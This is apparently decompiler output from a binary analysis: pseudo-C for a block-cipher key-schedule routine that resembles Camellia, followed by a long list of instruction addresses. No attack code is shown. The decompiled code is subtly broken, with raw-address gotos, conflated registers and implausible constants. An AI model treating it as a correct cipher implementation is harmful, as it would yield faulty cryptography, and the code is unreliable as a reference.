				unsigned int _t646;
				signed int _t650;
				signed int _t654;
				signed int _t664;
				signed int _t668;
				signed int _t672;
				signed int _t676;
				signed int _t680;
				signed int _t682;
				unsigned int _t684;
				signed int _t686;
				signed int _t688;
				signed int _t690;
				unsigned int _t692;
				signed int _t708;
				signed int _t710;
				signed int _t711;
				signed int _t713;
				signed int _t715;
				signed int _t717;
				signed int _t719;
				signed int _t720;
				signed int _t722;
				signed int _t724;
				signed long long _t737;
				signed long long _t743;
				signed long long _t749;
				signed long long _t755;
				signed long long _t761;
				signed long long _t767;
				signed long long _t773;
				signed long long _t780;
				signed long long _t786;
				signed long long _t792;
				signed long long _t798;
				signed long long _t820;
				signed long long _t821;
				signed long long _t822;
				signed long long _t823;
				signed long long _t824;
				signed long long _t825;
				signed long long _t826;
				signed long long _t827;
				signed long long _t828;
				signed long long _t829;

				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_a32 = __rdi;
				r12d =  *__rdx & 0x000000ff;
				r11d = __ecx;
				r12d = r12d << 8;
				r12d = r12d ^  *(__rdx + 1) & 0x000000ff;
				r12d = r12d << 8;
				r12d = r12d ^  *(__rdx + 2) & 0x000000ff;
				r12d = r12d << 8;
				r12d = r12d ^  *(__rdx + 3) & 0x000000ff;
				 *__r8 = r12d;
				r13d =  *(__rdx + 4) & 0x000000ff;
				r13d = r13d << 8;
				r13d = r13d ^  *(__rdx + 5) & 0x000000ff;
				r13d = r13d << 8;
				r13d = r13d ^  *(__rdx + 6) & 0x000000ff;
				r13d = r13d << 8;
				r13d = r13d ^  *(__rdx + 7) & 0x000000ff;
				 *(__r8 + 4) = r13d;
				r15d =  *(__rdx + 8) & 0x000000ff;
				r15d = r15d << 8;
				r15d = r15d ^  *(__rdx + 9) & 0x000000ff;
				r15d = r15d << 8;
				r15d = r15d ^  *(__rdx + 0xa) & 0x000000ff;
				r15d = r15d << 8;
				r15d = r15d ^  *(__rdx + 0xb) & 0x000000ff;
				 *(__r8 + 8) = r15d;
				 *(__r8 + 0xc) = ((( *(__rdx + 0xc) & 0x000000ff) << 0x00000008 ^  *(__rdx + 0xd) & 0x000000ff) << 0x00000008 ^  *(__rdx + 0xe) & 0x000000ff) << 0x00000008 ^  *(__rdx + 0xf) & 0x000000ff;
				if (__ecx == 0x80) goto 0xf30973c6;
				r12d =  *(__rdx + 0x10) & 0x000000ff;
				r12d = r12d << 8;
				r12d = r12d ^  *(__rdx + 0x11) & 0x000000ff;
				r12d = r12d << 8;
				r12d = r12d ^  *(__rdx + 0x12) & 0x000000ff;
				r12d = r12d << 8;
				r12d = r12d ^  *(__rdx + 0x13) & 0x000000ff;
				 *(__r8 + 0x20) = r12d;
				r13d =  *(__rdx + 0x14) & 0x000000ff;
				r13d = r13d << 8;
				r13d = r13d ^  *(__rdx + 0x15) & 0x000000ff;
				r13d = r13d << 8;
				r13d = r13d ^  *(__rdx + 0x16) & 0x000000ff;
				r13d = r13d << 8;
				r13d = r13d ^  *(__rdx + 0x17) & 0x000000ff;
				 *(__r8 + 0x24) = r13d;
				if (__ecx != 0xc0) goto 0xf309736a;
				r15d = r12d;
				r15d =  !r15d;
				 *(__r8 + 0x28) = r15d;
				goto 0xf30973b3;
				r15d =  *(__rdx + 0x18) & 0x000000ff;
				r15d = r15d << 8;
				r15d = r15d ^  *(__rdx + 0x19) & 0x000000ff;
				r15d = r15d << 8;
				r15d = r15d ^  *(__rdx + 0x1a) & 0x000000ff;
				r15d = r15d << 8;
				r15d = r15d ^  *(__rdx + 0x1b) & 0x000000ff;
				 *(__r8 + 0x28) = r15d;
				_t708 = ((( *(__rdx + 0x1c) & 0x000000ff) << 0x00000008 ^  *(__rdx + 0x1d) & 0x000000ff) << 0x00000008 ^  *(__rdx + 0x1e) & 0x000000ff) << 0x00000008 ^  *(__rdx + 0x1f) & 0x000000ff;
				r12d = r12d ^  *__r8;
				r13d = r13d ^  *(__r8 + 4);
				r15d = r15d ^  *(__r8 + 8);
				 *(__r8 + 0x2c) = _t708;
				_t680 =  *__r8;
				_t684 =  *(__r8 + 4);
				r8d = r12d;
				_t820 = __r8 ^ __rax;
				_t737 = _t820 >> 0x18;
				r10d =  *(0xf3177b70 + 0x800 + __rdx * 4);
				r10d = r10d ^  *(0xf3177b70 + 0xc00 + __rcx * 4);
				r10d = r10d ^  *(0xf3177b70 + _t737 * 4);
				r8d = r13d;
				_t821 = _t820 ^ 0x3bcc908b;
				r10d = r10d ^  *(0xf3177b70 + 0x400 + _t737 * 4);
				_t743 = _t821 >> 0x18;
				r9d =  *(0xf3177b70 + 0xc00 + __rdx * 4);
				r9d = r9d ^  *(0xf3177b70 + 0x400 + __rcx * 4);
				r9d = r9d ^  *(0xf3177b70 + 0x800 + _t743 * 4);
				r9d = r9d ^  *(0xf3177b70 + _t743 * 4);
				r9d = r9d ^ r10d;
				r10d = r10d >> 8;
				r15d = r15d ^ r9d;
				r8d = r15d;
				_t710 = _t708 ^  *(__r8 + 0xc) ^ (r10d << 0x00000018) + r10d ^ r9d;
				_t822 = _t821 ^ _t743;
				_t749 = _t822 >> 0x18;
				r10d =  *(0xf3177b70 + 0x800 + __rdx * 4);
				r10d = r10d ^  *(0xf3177b70 + 0xc00 + __rcx * 4);
				r10d = r10d ^  *(0xf3177b70 + _t749 * 4);
				r8d = _t710;
				_t823 = _t822 ^ 0x4caa73b2;
				r10d = r10d ^  *(0xf3177b70 + 0x400 + _t749 * 4);
				_t755 = _t823 >> 0x18;
				r9d =  *(0xf3177b70 + 0xc00 + __rdx * 4);
				r9d = r9d ^  *(0xf3177b70 + 0x400 + __rcx * 4);
				r9d = r9d ^  *(0xf3177b70 + 0x800 + _t755 * 4);
				r9d = r9d ^  *(0xf3177b70 + _t755 * 4);
				r9d = r9d ^ r10d;
				r12d = r12d ^ _t680 ^ r9d;
				r10d = r10d >> 8;
				r8d = r12d;
				r13d = r13d ^ (r10d << 0x00000018) + r10d ^ _t684 ^ r9d;
				_t824 = _t823 ^ _t755;
				_t761 = _t824 >> 0x18;
				r10d =  *(0xf3177b70 + 0x800 + __rdx * 4);
				r10d = r10d ^  *(0xf3177b70 + 0xc00 + __rcx * 4);
				r10d = r10d ^  *(0xf3177b70 + _t761 * 4);
				r8d = r13d;
				r10d = r10d ^  *(0xf3177b70 + 0x400 + _t761 * 4);
				_t825 = _t824 ^ _t761;
				_t767 = _t825 >> 0x18;
				r9d =  *(0xf3177b70 + 0xc00 + __rdx * 4);
				r9d = r9d ^  *(0xf3177b70 + 0x400 + __rcx * 4);
				r9d = r9d ^  *(0xf3177b70 + 0x800 + _t767 * 4);
				r9d = r9d ^  *(0xf3177b70 + _t767 * 4);
				r9d = r9d ^ r10d;
				_t510 =  *(__r8 + 0xc);
				r15d = r15d ^  *(__r8 + 8) ^ r9d;
				r10d = r10d >> 8;
				r8d = r15d;
				_t826 = _t825 ^ 0x54ff53a5;
				_t711 = _t710 ^ (r10d << 0x00000018) + r10d ^ _t510 ^ r9d;
				_t773 = _t826 >> 0x18;
				r10d =  *(0xf3177b70 + 0x800 + __rdx * 4);
				r10d = r10d ^  *(0xf3177b70 + 0xc00 + __rcx * 4);
				r10d = r10d ^  *(0xf3177b70 + _t773 * 4);
				r10d = r10d ^  *(0xf3177b70 + 0x400 + _t773 * 4);
				r9d = _t711;
				r8d =  *(0xf3177b70 + 0xc00 + __rdx * 4);
				r8d = r8d ^  *(0xf3177b70 + 0x400 + __rcx * 4);
				_t780 = (0xf3177b70 ^ _t773) >> 0x18;
				r8d = r8d ^  *(0xf3177b70 + 0x800 + _t780 * 4);
				r8d = r8d ^  *(0xf3177b70 + _t780 * 4);
				r8d = r8d ^ r10d;
				r12d = r12d ^ r8d;
				r10d = r10d >> 8;
				r13d = r13d ^ (r10d << 0x00000018) + r10d ^ r8d;
				if (r11d != 0x80) goto 0xf30979f6;
				r8d = _t711;
				 *(__r8 + 0x1c) = _t711;
				_t713 = _t711 << 0x0000000f | r12d >> 0x00000011;
				r8d = r8d >> 0x11;
				r11d = _t713;
				 *(__r8 + 0x3c) = _t713;
				r11d = r11d >> 0x11;
				 *(__r8 + 0x18) = r15d;
				r15d = r15d << 0xf;
				r8d = r8d | r15d;
				 *(__r8 + 0x14) = r13d;
				r10d = r8d;
				 *(__r8 + 0x38) = r8d;
				r10d = r10d >> 0x11;
				r8d = r8d << 0xf;
				r11d = r11d | r8d;
				r13d = r13d << 0xf;
				_t629 = r15d >> 0x00000011 | r13d;
				 *(__r8 + 0x10) = r12d;
				r9d = _t629;
				 *(__r8 + 0x34) = _t629;
				r10d = r10d | _t629 << 0x0000000f;
				r9d = r9d >> 0x11;
				 *(__r8 + 0x44) = r10d;
				r12d = r12d << 0xf;
				_t550 = r13d >> 0x00000011 | r12d;
				 *(__r8 + 0x48) = r11d;
				 *(__r8 + 0x30) = _t550;
				r9d = r9d | _t550 << 0x0000000f;
				_t715 = _t713 << 0x0000000f | _t550 >> 0x00000011;
				 *(__r8 + 0x40) = r9d;
				 *(__r8 + 0x4c) = _t715;
				r9d = r9d << 0xf;
				r10d = r10d << 0xf;
				_t633 = r11d >> 0x00000011 | r10d;
				r10d = _t633;
				 *(__r8 + 0x64) = _t633;
				_t554 = r10d >> 0x00000011 | r9d;
				r11d = r11d << 0xf;
				r9d = _t715;
				r10d = r10d >> 0x11;
				r9d = r9d >> 0x11;
				r9d = r9d | r11d;
				_t717 = _t715 << 0x0000000f | r9d >> 0x00000011;
				 *(__r8 + 0x60) = _t554;
				r8d = r9d;
				r8d = r8d >> 0x11;
				r8d = r8d | _t633 << 0x0000000f;
				r9d = r9d << 0xf;
				r10d = r10d | _t554 << 0x0000000f;
				_t637 = _t717 >> 0x00000011 | r9d;
				_t719 = _t717 << 0x0000000f | _t554 >> 0x00000011;
				 *(__r8 + 0x78) = _t637;
				 *(__r8 + 0x70) = r10d;
				 *(__r8 + 0x74) = r8d;
				 *(__r8 + 0x7c) = _t719;
				r9d = _t637;
				r9d = r9d >> 0x1e;
				r8d = _t719;
				r9d = r9d | _t826 * 0x00000004;
				r8d = r8d >> 0x1e;
				r8d = r8d | 0x87bcc5dedc0;
				 *(__r8 + 0xa0) = r9d;
				 *(__r8 + 0xa4) = r8d;
				r10d = __r10 * 4;
				r10d = r10d | r8d >> 0x0000001e;
				_t639 = __rbp * 0x00000004 | r10d >> 0x0000001e;
				 *(__r8 + 0xac) = r10d;
				 *(__r8 + 0xa8) = _t639;
				r9d = r9d << 0x11;
				r8d = r8d << 0x11;
				 *(__r8 + 0xc0) = r8d >> 0x0000000f | r9d;
				r9d = _t510;
				 *(__r8 + 0xc4) = _t639 >> 0x0000000f | r8d;
				r9d = r9d >> 0x11;
				 *(__r8 + 0xc8) = _t639 << 0x00000011 | r10d >> 0x0000000f;
				_t512 = _t510 << 0x0000000f | _t680 >> 0x00000011;
				r10d = r10d << 0x11;
				r10d = r10d | r9d >> 0x0000000f;
				_t560 =  *(__r8 + 8);
				r8d = _t560;
				r8d = r8d >> 0x11;
				r8d = r8d | _t684 << 0x0000000f;
				r9d = r9d | _t560 << 0x0000000f;
				_t644 = _t684 >> 0x00000011 | _t680 << 0x0000000f;
				 *(__r8 + 0x24) = r8d;
				 *(__r8 + 0x20) = _t644;
				_t646 = _t644 << 0x0000001e | r8d >> 0x00000002;
				r8d = r8d << 0x1e;
				 *(__r8 + 0x28) = r9d;
				r8d = r8d | r9d >> 0x00000002;
				r9d = r9d << 0x1e;
				 *(__r8 + 0x2c) = _t512;
				r9d = r9d | _t512 >> 0x00000002;
				_t514 = _t512 << 0x0000001e | _t644 >> 0x00000002;
				 *(__r8 + 0x58) = r9d;
				 *(__r8 + 0xcc) = r10d;
				 *(__r8 + 0x50) = _t646;
				 *(__r8 + 0x54) = r8d;
				 *(__r8 + 0x5c) = _t514;
				_t566 = r8d >> 0x00000011 | _t646 << 0x0000000f;
				r8d = r8d << 0xf;
				r9d = r9d << 0xf;
				_t650 = r9d >> 0x00000011 | r8d;
				r8d = _t514;
				r8d = r8d >> 0x11;
				r8d = r8d | r9d;
				_t516 = _t514 << 0x0000000f | _t646 >> 0x00000011;
				 *(__r8 + 0x68) = r8d;
				 *(__r8 + 0x6c) = _t516;
				r9d = _t650;
				r9d = r9d >> 0xf;
				r9d = r9d | _t566 << 0x00000011;
				_t570 = r8d >> 0x0000000f | _t650 << 0x00000011;
				r8d = r8d << 0x11;
				 *(__r8 + 0x80) = r9d;
				_t654 = _t516 >> 0x0000000f | r8d;
				_t518 = _t516 << 0x00000011 | _t566 >> 0x0000000f;
				 *(__r8 + 0x84) = _t570;
				 *(__r8 + 0x8c) = _t518;
				r8d = _t570;
				r9d = r9d << 0x11;
				r10d = _t518;
				r8d = r8d >> 0xf;
				r8d = r8d | r9d;
				 *(__r8 + 0x88) = _t654;
				r9d = _t654;
				r10d = r10d >> 0xf;
				r10d = r10d | _t654 << 0x00000011;
				r9d = r9d >> 0xf;
				r9d = r9d | _t570 << 0x00000011;
				_t520 = _t518 << 0x00000011 | r9d >> 0x0000000f;
				 *(__r8 + 0x94) = r9d;
				 *(__r8 + 0x9c) = _t520;
				r9d = r9d << 0x11;
				 *(__r8 + 0xb4) = r10d >> 0x0000000f | r9d;
				 *(__r8 + 0x98) = r10d;
				r10d = r10d << 0x11;
				 *(__r8 + 0x90) = r8d;
				r8d = r8d << 0x11;
				 *(__r8 + 0xb8) = _t520 >> 0x0000000f | r10d;
				 *(__r8 + 0xb0) = r9d >> 0x0000000f | r8d;
				goto 0xf3097fd5;
				_t523 =  *(__r8 + 0x20);
				_t682 =  *(__r8 + 0x24);
				_t686 =  *(__r8 + 0x2c);
				 *(__r8 + 0x30) = r12d;
				r12d = r12d ^ _t523;
				r8d = r12d;
				_t827 = _t826 ^ 0x10e527fa;
				 *(__r8 + 0x34) = r13d;
				 *(__r8 + 0x38) = r15d;
				r13d = r13d ^ _t682;
				_t786 = _t827 >> 0x18;
				r10d =  *0xA9ABF757130;
				 *(__r8 + 0x3c) = _t719;
				r10d = r10d ^  *(0xf3177b70 + 0xc00 + __rcx * 4);
				r10d = r10d ^  *(0xf3177b70 + _t786 * 4);
				r8d = r13d;
				r10d = r10d ^  *(0xf3177b70 + 0x400 + _t786 * 4);
				_t828 = _t827 ^ _t786;
				_t792 = _t828 >> 0x18;
				r9d =  *0xA9ABF757530;
				r9d = r9d ^  *(0xf3177b70 + 0x400 + __rcx * 4);
				r9d = r9d ^  *(0xf3177b70 + 0x800 + _t792 * 4);
				r9d = r9d ^  *(0xf3177b70 + _t792 * 4);
				r11d =  *(__r8 + 0x28);
				r9d = r9d ^ r10d;
				r15d = r15d ^ r11d ^ r9d;
				r10d = r10d >> 8;
				r8d = r15d;
				_t720 = _t719 ^ (r10d << 0x00000018) + r10d ^ _t686 ^ r9d;
				_t829 = _t828 ^ _t792;
				_t798 = _t829 >> 0x18;
				r10d =  *0xA9ABF757130;
				r10d = r10d ^  *(0xf3177b70 + 0xc00 + __rcx * 4);
				r10d = r10d ^  *(0xf3177b70 + _t798 * 4);
				r10d = r10d ^  *(0xf3177b70 + 0x400 + _t798 * 4);
				r9d = _t720;
				r8d =  *0xA9ABF757530;
				 *(__r8 + 0x1c) = _t720;
				r8d = r8d ^  *(0xf3177b70 + 0x400 + __rcx * 4);
				 *(__r8 + 0x18) = r15d;
				r8d = r8d ^  *0xA9ABF757130;
				r8d = r8d ^  *0x21EF602EA24;
				r8d = r8d ^ r10d;
				r12d = r12d ^ r8d;
				r10d = r10d >> 8;
				 *(__r8 + 0x10) = r12d;
				r13d = r13d ^ (r10d << 0x00000018) + r10d ^ r8d;
				r12d = r12d << 0x1e;
				r12d = r12d | r13d >> 0x00000002;
				 *(__r8 + 0x14) = r13d;
				r13d = r13d << 0x1e;
				r13d = r13d | r15d >> 0x00000002;
				r15d = r15d << 0x1e;
				 *(__r8 + 0x50) = r12d;
				r15d = r15d | _t720 >> 0x00000002;
				_t722 = _t720 << 0x0000001e | r12d >> 0x00000002;
				 *(__r8 + 0x54) = r13d;
				 *(__r8 + 0x5c) = _t722;
				r12d = r12d << 0x1e;
				r12d = r12d | r13d >> 0x00000002;
				r13d = r13d << 0x1e;
				r13d = r13d | r15d >> 0x00000002;
				 *(__r8 + 0x58) = r15d;
				r15d = r15d << 0x1e;
				r15d = r15d | _t722 >> 0x00000002;
				_t724 = _t722 << 0x0000001e | r12d >> 0x00000002;
				 *(__r8 + 0xa0) = r12d;
				 *(__r8 + 0xac) = _t724;
				 *(__r8 + 0xa4) = r13d;
				r13d = r13d << 0x13;
				 *(__r8 + 0xa8) = r15d;
				 *(__r8 + 0x100) = r15d >> 0x0000000d | r13d;
				r15d = r15d << 0x13;
				 *(__r8 + 0x104) = _t724 >> 0x0000000d | r15d;
				r12d = r12d << 0x13;
				r12d = r12d | r13d >> 0x0000000d;
				 *(__r8 + 0x108) = _t724 << 0x00000013 | r12d >> 0x0000000d;
				 *(__r8 + 0x10c) = r12d;
				r8d = _t686;
				_t688 = _t686 << 0x0000000f | _t523 >> 0x00000011;
				r11d = r11d << 0xf;
				r10d = _t688;
				 *(__r8 + 0x2c) = _t688;
				_t587 = _t682 >> 0x00000011 | _t523 << 0x0000000f;
				 *(__r8 + 0x20) = _t587;
				_t690 = _t688 << 0x0000000f | _t587 >> 0x00000011;
				r10d = r10d >> 0x11;
				r8d = r8d >> 0x11;
				r8d = r8d | r11d;
				_t664 = r11d >> 0x00000011 | _t682 << 0x0000000f;
				 *(__r8 + 0x4c) = _t690;
				r11d = _t664;
				 *(__r8 + 0x24) = _t664;
				r9d = r8d;
				r9d = r9d >> 0x11;
				r9d = r9d | _t664 << 0x0000000f;
				r11d = r11d >> 0x11;
				r11d = r11d | _t587 << 0x0000000f;
				 *(__r8 + 0x44) = r9d;
				 *(__r8 + 0x40) = r11d;
				r11d = r11d << 0x1e;
				r11d = r11d | r9d >> 0x00000002;
				r9d = r9d << 0x1e;
				 *(__r8 + 0x28) = r8d;
				r8d = r8d << 0xf;
				r10d = r10d | r8d;
				 *(__r8 + 0x90) = r11d;
				 *(__r8 + 0x48) = r10d;
				r9d = r9d | r10d >> 0x00000002;
				r10d = r10d << 0x1e;
				 *(__r8 + 0x94) = r9d;
				r10d = r10d | _t690 >> 0x00000002;
				_t692 = _t690 << 0x0000001e | r11d >> 0x00000002;
				 *(__r8 + 0x98) = r10d;
				 *(__r8 + 0x9c) = _t692;
				 *(__r8 + 0xd0) = r10d >> 0x0000001e | (0xf3177b70 ^ _t798) * 0x00000004;
				 *(__r8 + 0xd4) = _t692 >> 0x0000001e | __r10 * 0x00000004;
				 *(__r8 + 0xd8) = __rsi * 0x00000004 | r11d >> 0x0000001e;
				_t599 =  *(__r8 + 0x34);
				_t668 =  *(__r8 + 0x38);
				 *(__r8 + 0xdc) = 0x87bcc5dedc0 | r9d >> 0x0000001e;
				_t479 =  *(__r8 + 0x30);
				r11d =  *(__r8 + 0x3c);
				r8d = _t479;
				r10d = r11d;
				r11d = r11d << 0xf;
				r9d = _t668;
				r9d = r9d >> 0x11;
				r9d = r9d | _t599 << 0x0000000f;
				_t527 = _t599 >> 0x00000011 | _t479 << 0x0000000f;
				r10d = r10d >> 0x11;
				r10d = r10d | _t668 << 0x0000000f;
				 *(__r8 + 0x30) = _t527;
				_t529 = _t527 << 0x0000001e | r9d >> 0x00000002;
				r8d = r8d >> 0x11;
				r11d = r11d | r8d;
				 *(__r8 + 0x34) = r9d;
				 *(__r8 + 0x3c) = r11d;
				r9d = r9d << 0x1e;
				r9d = r9d | r10d >> 0x00000002;
				 *(__r8 + 0x38) = r10d;
				r10d = r10d << 0x1e;
				r10d = r10d | r11d >> 0x00000002;
				r11d = r11d << 0x1e;
				r11d = r11d | _t527 >> 0x00000002;
				 *(__r8 + 0x74) = r9d;
				 *(__r8 + 0x7c) = r11d;
				 *(__r8 + 0xc8) = r11d;
				 *(__r8 + 0xc0) = r9d;
				r9d = r9d << 0x11;
				 *(__r8 + 0x70) = _t529;
				r9d =  *(__r8 + 8);
				 *(__r8 + 0xe0) = r10d >> 0x0000000f | r9d;
				r11d = r11d << 0x11;
				 *(__r8 + 0xcc) = _t529;
				r9d = r9d << 0xd;
				 *(__r8 + 0x78) = r10d;
				 *(__r8 + 0xc4) = r10d;
				r10d = r10d << 0x11;
				 *(__r8 + 0xe4) = r11d >> 0x0000000f | r10d;
				r11d = r11d | _t529 >> 0x0000000f;
				_t495 =  *(__r8 + 4);
				 *(__r8 + 0xe8) = r11d;
				r11d =  *(__r8 + 0xc);
				r8d = r11d;
				r8d = r8d >> 0x13;
				_t672 = r9d >> 0x00000013 | _t495 << 0x0000000d;
				r8d = r8d | r9d;
				 *(__r8 + 0xec) = _t529 << 0x00000011 | r9d >> 0x0000000f;
				_t532 =  *__r8;
				r11d = r11d << 0xd;
				r9d = r8d;
				r11d = r11d | _t532 >> 0x00000013;
				 *(__r8 + 0x60) = _t672;
				_t534 = _t532 << 0x0000000d | _t495 >> 0x00000013;
				 *(__r8 + 0x68) = r11d;
				 *(__r8 + 0x64) = r8d;
				r8d = r8d << 0xf;
				 *(__r8 + 0x6c) = _t534;
				_t536 = _t534 << 0x0000000f | _t672 >> 0x00000011;
				r9d = r9d >> 0x11;
				r9d = r9d | _t672 << 0x0000000f;
				 *(__r8 + 0x8c) = _t536;
				 *(__r8 + 0x80) = r9d;
				_t676 = r11d >> 0x00000011 | r8d;
				r11d = r11d << 0xf;
				r10d = _t676;
				r11d = r11d | _t534 >> 0x00000011;
				 *(__r8 + 0x84) = _t676;
				r8d = r11d;
				r8d = r8d >> 0xf;
				r8d = r8d | _t676 << 0x00000011;
				 *(__r8 + 0x88) = r11d;
				r11d = r11d << 0x11;
				r11d = r11d | _t536 >> 0x0000000f;
				_t538 = _t536 << 0x00000011 | r9d >> 0x0000000f;
				r10d = r10d >> 0xf;
				r9d = r9d << 0x11;
				r10d = r10d | r9d;
				 *(__r8 + 0xb0) = r10d;
				 *(__r8 + 0xb4) = r8d;
				 *(__r8 + 0xf0) = r11d >> 0x0000001e | _t829 * 0x00000004;
				 *(__r8 + 0xb8) = r11d;
				 *(__r8 + 0xf4) = 0x87bcc5dedc0 | _t538 >> 0x0000001e;
				 *(__r8 + 0xf8) = r10d >> 0x0000001e | 0x87bcc5dedc0;
				 *(__r8 + 0xfc) = __r10 * 0x00000004 | r8d >> 0x0000001e;
				 *(__r8 + 0xbc) = _t538;
				return 4;
			}











































































                                        0x21ef3097230
                                        0x21ef3097235
                                        0x21ef309723a
                                        0x21ef309723f
                                        0x21ef3097253
                                        0x21ef3097257
                                        0x21ef309725a
                                        0x21ef309725e
                                        0x21ef3097265
                                        0x21ef3097269
                                        0x21ef3097270
                                        0x21ef3097274
                                        0x21ef3097277
                                        0x21ef309727e
                                        0x21ef3097283
                                        0x21ef3097287
                                        0x21ef309728e
                                        0x21ef3097292
                                        0x21ef3097299
                                        0x21ef309729d
                                        0x21ef30972a0
                                        0x21ef30972a8
                                        0x21ef30972ad
                                        0x21ef30972b1
                                        0x21ef30972b8
                                        0x21ef30972bc
                                        0x21ef30972c3
                                        0x21ef30972c7
                                        0x21ef30972ca
                                        0x21ef30972ed
                                        0x21ef30972f7
                                        0x21ef3097301
                                        0x21ef3097306
                                        0x21ef309730a
                                        0x21ef3097311
                                        0x21ef3097315
                                        0x21ef309731c
                                        0x21ef3097320
                                        0x21ef3097323
                                        0x21ef309732b
                                        0x21ef3097330
                                        0x21ef3097334
                                        0x21ef309733b
                                        0x21ef309733f
                                        0x21ef3097346
                                        0x21ef309734a
                                        0x21ef309734d
                                        0x21ef3097357
                                        0x21ef3097359
                                        0x21ef309735f
                                        0x21ef3097364
                                        0x21ef3097368
                                        0x21ef309736e
                                        0x21ef3097373
                                        0x21ef3097377
                                        0x21ef309737e
                                        0x21ef3097382
                                        0x21ef3097389
                                        0x21ef309738d
                                        0x21ef3097390
                                        0x21ef30973b1
                                        0x21ef30973b3
                                        0x21ef30973b6
                                        0x21ef30973ba
                                        0x21ef30973be
                                        0x21ef30973c6
                                        0x21ef30973d0
                                        0x21ef30973d9
                                        0x21ef30973dc
                                        0x21ef30973f6
                                        0x21ef30973fa
                                        0x21ef3097402
                                        0x21ef309740a
                                        0x21ef3097412
                                        0x21ef3097415
                                        0x21ef309741c
                                        0x21ef309743b
                                        0x21ef309743f
                                        0x21ef3097447
                                        0x21ef309744f
                                        0x21ef309745b
                                        0x21ef3097465
                                        0x21ef3097468
                                        0x21ef309746c
                                        0x21ef3097472
                                        0x21ef3097478
                                        0x21ef309747f
                                        0x21ef3097499
                                        0x21ef309749d
                                        0x21ef30974a5
                                        0x21ef30974ad
                                        0x21ef30974b5
                                        0x21ef30974b8
                                        0x21ef30974bf
                                        0x21ef30974de
                                        0x21ef30974e2
                                        0x21ef30974ea
                                        0x21ef30974f2
                                        0x21ef30974fe
                                        0x21ef3097504
                                        0x21ef309750a
                                        0x21ef3097513
                                        0x21ef309751c
                                        0x21ef3097522
                                        0x21ef309752a
                                        0x21ef3097544
                                        0x21ef3097548
                                        0x21ef3097550
                                        0x21ef3097558
                                        0x21ef3097560
                                        0x21ef3097563
                                        0x21ef3097570
                                        0x21ef309758a
                                        0x21ef309758e
                                        0x21ef3097596
                                        0x21ef309759e
                                        0x21ef30975aa
                                        0x21ef30975b2
                                        0x21ef30975b5
                                        0x21ef30975bc
                                        0x21ef30975c5
                                        0x21ef30975cc
                                        0x21ef30975d1
                                        0x21ef30975e2
                                        0x21ef30975fb
                                        0x21ef30975ff
                                        0x21ef3097607
                                        0x21ef309760f
                                        0x21ef3097617
                                        0x21ef3097624
                                        0x21ef3097645
                                        0x21ef3097657
                                        0x21ef309765f
                                        0x21ef3097663
                                        0x21ef309766f
                                        0x21ef3097673
                                        0x21ef309767c
                                        0x21ef309767f
                                        0x21ef3097689
                                        0x21ef3097693
                                        0x21ef3097699
                                        0x21ef309769c
                                        0x21ef30976b5
                                        0x21ef30976b7
                                        0x21ef30976bb
                                        0x21ef30976be
                                        0x21ef30976c5
                                        0x21ef30976c9
                                        0x21ef30976cd
                                        0x21ef30976d1
                                        0x21ef30976d4
                                        0x21ef30976d8
                                        0x21ef30976db
                                        0x21ef30976df
                                        0x21ef30976e3
                                        0x21ef30976e7
                                        0x21ef30976ea
                                        0x21ef30976ee
                                        0x21ef30976f1
                                        0x21ef30976f5
                                        0x21ef30976f8
                                        0x21ef30976ff
                                        0x21ef3097702
                                        0x21ef3097706
                                        0x21ef3097710
                                        0x21ef3097714
                                        0x21ef3097717
                                        0x21ef309771d
                                        0x21ef3097724
                                        0x21ef309772a
                                        0x21ef309772c
                                        0x21ef3097733
                                        0x21ef3097737
                                        0x21ef309773e
                                        0x21ef3097742
                                        0x21ef3097748
                                        0x21ef309774b
                                        0x21ef3097755
                                        0x21ef3097758
                                        0x21ef309775c
                                        0x21ef309775f
                                        0x21ef3097763
                                        0x21ef3097767
                                        0x21ef309776d
                                        0x21ef309776f
                                        0x21ef3097773
                                        0x21ef3097778
                                        0x21ef309777c
                                        0x21ef3097784
                                        0x21ef309778b
                                        0x21ef309778e
                                        0x21ef3097797
                                        0x21ef3097799
                                        0x21ef309779d
                                        0x21ef30977a1
                                        0x21ef30977ad
                                        0x21ef30977b1
                                        0x21ef30977b7
                                        0x21ef30977bb
                                        0x21ef30977be
                                        0x21ef30977c1
                                        0x21ef30977cf
                                        0x21ef30977d2
                                        0x21ef30977d9
                                        0x21ef30977ea
                                        0x21ef30977f5
                                        0x21ef30977f8
                                        0x21ef30977fa
                                        0x21ef3097804
                                        0x21ef3097811
                                        0x21ef3097818
                                        0x21ef309781c
                                        0x21ef3097823
                                        0x21ef3097834
                                        0x21ef3097843
                                        0x21ef3097847
                                        0x21ef309785b
                                        0x21ef309785d
                                        0x21ef3097861
                                        0x21ef3097867
                                        0x21ef309786b
                                        0x21ef309786e
                                        0x21ef3097872
                                        0x21ef3097878
                                        0x21ef309787e
                                        0x21ef3097880
                                        0x21ef3097887
                                        0x21ef3097893
                                        0x21ef3097895
                                        0x21ef309789c
                                        0x21ef30978a3
                                        0x21ef30978a6
                                        0x21ef30978ac
                                        0x21ef30978b3
                                        0x21ef30978bc
                                        0x21ef30978be
                                        0x21ef30978c2
                                        0x21ef30978c9
                                        0x21ef30978cd
                                        0x21ef30978d3
                                        0x21ef30978e3
                                        0x21ef30978e5
                                        0x21ef30978ec
                                        0x21ef30978f3
                                        0x21ef30978f6
                                        0x21ef30978f9
                                        0x21ef30978fd
                                        0x21ef3097903
                                        0x21ef3097905
                                        0x21ef309790b
                                        0x21ef3097912
                                        0x21ef309791b
                                        0x21ef309791f
                                        0x21ef3097928
                                        0x21ef309792a
                                        0x21ef3097930
                                        0x21ef309793a
                                        0x21ef3097940
                                        0x21ef3097942
                                        0x21ef309794c
                                        0x21ef3097956
                                        0x21ef3097959
                                        0x21ef309795d
                                        0x21ef3097963
                                        0x21ef3097967
                                        0x21ef309796a
                                        0x21ef3097971
                                        0x21ef3097974
                                        0x21ef309797b
                                        0x21ef309797e
                                        0x21ef3097982
                                        0x21ef3097988
                                        0x21ef309798a
                                        0x21ef3097994
                                        0x21ef30979a1
                                        0x21ef30979ae
                                        0x21ef30979ba
                                        0x21ef30979c1
                                        0x21ef30979c8
                                        0x21ef30979cf
                                        0x21ef30979dc
                                        0x21ef30979ea
                                        0x21ef30979f1
                                        0x21ef30979f6
                                        0x21ef3097a01
                                        0x21ef3097a05
                                        0x21ef3097a09
                                        0x21ef3097a0d
                                        0x21ef3097a10
                                        0x21ef3097a13
                                        0x21ef3097a1a
                                        0x21ef3097a21
                                        0x21ef3097a29
                                        0x21ef3097a3c
                                        0x21ef3097a40
                                        0x21ef3097a48
                                        0x21ef3097a4c
